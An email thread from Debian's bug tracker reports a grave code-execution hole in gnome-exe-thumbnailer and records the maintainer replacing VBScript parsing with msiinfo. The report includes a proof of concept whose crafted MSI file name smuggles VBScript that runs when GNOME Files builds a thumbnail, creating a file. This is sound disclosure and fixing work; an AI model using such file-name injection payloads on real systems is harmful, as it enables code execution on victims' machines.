Control: tag 868705 + pending fixed-upstream Hi,
msiinfo is part of msitools, just like wixl: https://github.com/GNOME/msitools. I haven't audited the code, but being under the GNOME umbrella and having a history of 5 years probably means that it's reliable enough. (I've also heard reports so far that msiinfo is a lot /faster/ than running code through Wine's cscript, which is not really much of a surprise.) Best, James On 18/07/17 09:02 AM, Nils Dagsson Moskopp wrote: > I like that the patch is less code. Deleted code is debugged code! > Btw, are you sure that using mssiinfo does not introduce new bugs? > > Cheers, > Nils > > James Lu <bitfl...@gmail.com> writes: > >> [ Unknown signature status ] >> Hi Nils, >> >> I wasn't able to reproduce the exploit on my (64-bit) system with either >> Caja and Nautilus (it also required setting up a new wineprefix in >> ~/.wine). The msi thumbnail ended up generating without any version >> information tag at all. >> >> Regardless, I've gone and replaced the VBScript-based parsing entirely >> with msitools' msiinfo in >> https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5; >> hopefully this should fix the issue. I'll tag a new release soon and >> look at pushing the fix to Debian. >> >> (Also CC'ing the other maintainers, who I don't think are on the Debian >> Wine list) >> >> Best, >> James >> >> On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote: >>> Package: gnome-exe-thumbnailer >>> Version: 0.9.4-2 >>> Severity: grave >>> Tags: security >>> Justification: user security hole >>> >>> Dear Maintainer, >>> >>> the following PoC is copied verbatim from my post about the parsing issue: >>> http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html >>> >>> Proof of Concept >>> >>> Install Dependencies >>> >>> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus >>> and wixl. The wixl package is only needed to create MSI files that trigger >>> the thumbnailer. >>> >>> If the proof of concept does not work, install winetricks and run >>> winetricks wsh56 to upgrade the Windows Script Host. >>> >>> Create MSI Files >>> >>> Create a file named poc.xml with the following content: >>> >>> <?xml version="1.0" encoding="utf-8"?> >>> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi";> >>> <Product Version="1.0"/> >>> </Wix> >>> >>> Execute the following Bourne Shell code: >>> >>> wixl -o poc.msi poc.xml >>> cp poc.msi "poc.msi\",0):Set >>> fso=CreateObject(\"Scripting.FileSystemObject\"):Set >>> poc=fso.CreateTextFile(\"badtaste.txt\")'.msi" >>> >>> Trigger Execution >>> >>> Start GNOME Files and navigate to the folder with the MSI files. An empty >>> file with the name badtaste.txt should appear. >>> >>> *** End of the template - remove these template lines *** >>> >>> >>> -- System Information: >>> Debian Release: 9.0 >>> APT prefers stable >>> APT policy: (500, 'stable') >>> Architecture: i386 (i686) >>> >>> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core) >>> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) >>> Shell: /bin/sh linked to /bin/dash >>> Init: sysvinit (via /sbin/init) >>> >>> Versions of packages gnome-exe-thumbnailer depends on: >>> ii icoutils 0.31.2-1.1 >>> ii imagemagick 8:6.9.7.4+dfsg-11 >>> ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11 >>> ii libglib2.0-bin 2.50.3-2 >>> >>> Versions of packages gnome-exe-thumbnailer recommends: >>> pn wine >>> <none> >>> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev >>> <none> >>> >>> gnome-exe-thumbnailer suggests no packages. >>> >>> -- no debconf information >>> >>> _______________________________________________ >>> pkg-wine-party mailing list >>> pkg-wine-pa...@lists.alioth.debian.org >>> http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-wine-party >>> >> >
signature.asc
Description: OpenPGP digital signature
